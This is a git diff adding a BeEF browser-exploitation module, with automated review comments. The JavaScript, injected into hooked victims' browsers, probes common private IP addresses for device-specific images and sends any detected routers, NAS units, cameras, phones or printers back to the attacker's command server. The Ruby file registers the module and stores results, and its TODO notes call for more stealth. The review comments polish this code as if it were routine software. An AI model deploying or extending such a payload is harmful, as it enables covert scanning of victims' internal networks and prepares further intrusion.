diff --git a/modules/commands/network/detect_local_settings/fingerprint_local_network.js b/modules/commands/network/detect_local_settings/fingerprint_local_network.js
new file mode 100644
index 000000000..c9ebbecc3
--- /dev/null
+++ b/modules/commands/network/detect_local_settings/fingerprint_local_network.js
@@ -0,0 +1,51 @@
+beef.execute(function() {
+
+ var dom = document.createElement('b');
+ var ips = [
+ 'http://192.168.0.1',
+ 'http://192.168.0.100',
+ 'http://192.168.0.254',
+ 'http://192.168.1.1',
+ 'http://192.168.1.100',
+ 'http://192.168.1.254',
+ 'http://10.0.0.1',
+ 'http://10.1.1.1',
+ 'http://192.168.2.1',
+ 'http://192.168.2.254',
+ 'http://192.168.100.1',
+ 'http://192.168.100.254',
+ 'http://192.168.123.1',
+ 'http://192.168.123.254'
+ ];
+ var urls = new Array(
+ new Array("QNAP NAS",":8080","/ajax_obj/img/running.gif",16,16),
+ new Array("QNAP NAS",":8080","/ajax_obj/images/qnap_logo_w.gif",115,21),
+ new Array("Belkin Router",":80","/images/title_2.gif",321,28),
+ new Array("SMC Networks",":80","/images/logo.gif",133,59),
+ new Array("Linksys NAS",":80","/Admin_top.JPG",750,52),
+ new Array("Linksys NAS",":80","/logo.jpg",194,52),
+ new Array("Linksys Network Camera",":80","/welcome.jpg",146,250),
+ new Array("Linksys Wireless-G Camera",":80","/header.gif",750,97),
+ new Array("Cisco IP Phone",":80","/Images/Logo",120,66),
+ new Array("Snom Phone",":80","/img/snom_logo.png",168,62),
+ new Array("Brother Printer",":80","/pbio/brother.gif",144,52),
+ new Array("HP LaserJet",":80","/hp/device/images/logo.gif",42,27)
+ );
+
+ // for each ip
+ for(var i=0; i < ips.length; i++) {
+
+ // for each url
+ for(var u=0; u < urls.length; u++) {
+ var img = new Image;
+ img.id = u;
+ img.src = ips[i]+urls[u][1]+urls[u][2];
+ //img.title = ips[i]+urls[u][1];
+ img.onload = function() { if (this.width == urls[this.id][3] && this.height == urls[this.id][4]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'device='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
+ dom.appendChild(img);
+ }
+ }
+ // setTimeout("beef.net.send('<%= @command_url %>', <%= @command_id %>,'device=Failed')", 60000)
+
+});
+
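Review bot: The `img.onload` line encodes the reported values with the deprecated `escape()`, which leaves characters such as `+` and `/` unencoded or encodes them differently from the server-side decoder, so a `url=` value containing them can be parsed incorrectly on the receiving end; `encodeURIComponent(urls[this.id][0])` and `encodeURIComponent(this.src)` are the drop-in replacements. The same line compares two numeric values with `==` where `===` is intended. Because the `setTimeout` fallback is left commented out, nothing is sent when no image matches, so the `content['fail']` branch in the companion `fingerprint_local_network.rb` callback can never run; a header comment such as `// No callback is sent when no device matches; the Ruby side's 'fail' branch is therefore unreachable.` would make that behaviour explicit for maintainers. The `var`/`new Array(...)` forms could be `const` and array literals, but that is a style preference only.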
diff --git a/modules/commands/network/detect_local_settings/fingerprint_local_network.rb b/modules/commands/network/detect_local_settings/fingerprint_local_network.rb
new file mode 100644
index 000000000..214ccd3a7
--- /dev/null
+++ b/modules/commands/network/detect_local_settings/fingerprint_local_network.rb
@@ -0,0 +1,70 @@
+module BeEF
+module Modules
+module Commands
+#
+# Fingerprint local network module
+# This module attempts to fingerprint embedded devices within the zombies'
+# local network. It does this by loading images on common local network
+# IP addresses then matching the image width, height and path to those
+# for a known device.
+#
+# TODO #
+#
+# Add IPv6 support
+# Add HTTPS support
+# - Devices with invalid certs are blocked by IE and FF by default
+# Improve stealth
+# - Load images with CSS "background:" CSS to avoid http auth login popups
+# Improve speed
+# - Make IP addresses a user-configurable option rather than a hard-coded list
+# - Detect local ip range first - using browser history and/or with java
+# - History theft via CSS history is patched in modern browsers.
+# - Local IP theft with Java is slow and may fail
+
+
+class Fingerprint_local_network < BeEF::Command
+
+ def initialize
+ super({
+ 'Name' => 'Fingerprint local network',
+ 'Description' => 'Scan common local network IP addresses for embedded devices.',
+ 'Category' => 'Network',
+ 'Author' => ['bcoles@gmail.com', 'wade'],
+ 'File' => __FILE__
+ })
+
+ # Doesn't work in FF4 (but works in 3.x)
+ set_target({
+ 'verified_status' => VERIFIED_USER_NOTIFY,
+ 'browser_name' => FF
+ })
+
+ set_target({
+ 'verified_status' => VERIFIED_NOT_WORKING,
+ 'browser_name' => O
+ })
+
+ set_target({
+ 'verified_status' => VERIFIED_USER_NOTIFY,
+ 'browser_name' => IE
+ })
+
+ use_template!
+ end
+
+ def callback
+ content = {}
+ content['device'] =@datastore['device'] if not @datastore['device'].nil?
+ content['url'] = @datastore['url'] if not @datastore['url'].nil?
+ if content.empty?
+ content['fail'] = 'Did not detect any local network devices'
+ end
+ save content
+ end
+
+end
+
+end
+end
+end
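Review bot: In `callback`, `content['device'] =@datastore['device'] if not @datastore['device'].nil?` is missing the space after `=` and uses `if not ... .nil?` where the idiomatic form is `content['device'] = @datastore['device'] unless @datastore['device'].nil?`; the following `url` line has the same shape. The `content['fail']` branch only runs when the browser posts a callback with neither `device` nor `url`, and the companion JavaScript in this commit only posts on an image match (its timeout fallback is commented out), so a short comment on that branch noting when it is actually reachable would help the next reader. The class name `Fingerprint_local_network` mixes underscores into a CamelCase constant; `FingerprintLocalNetwork` follows Ruby convention, but since the module loader may derive the name from the file, confirm how BeEF resolves it before renaming.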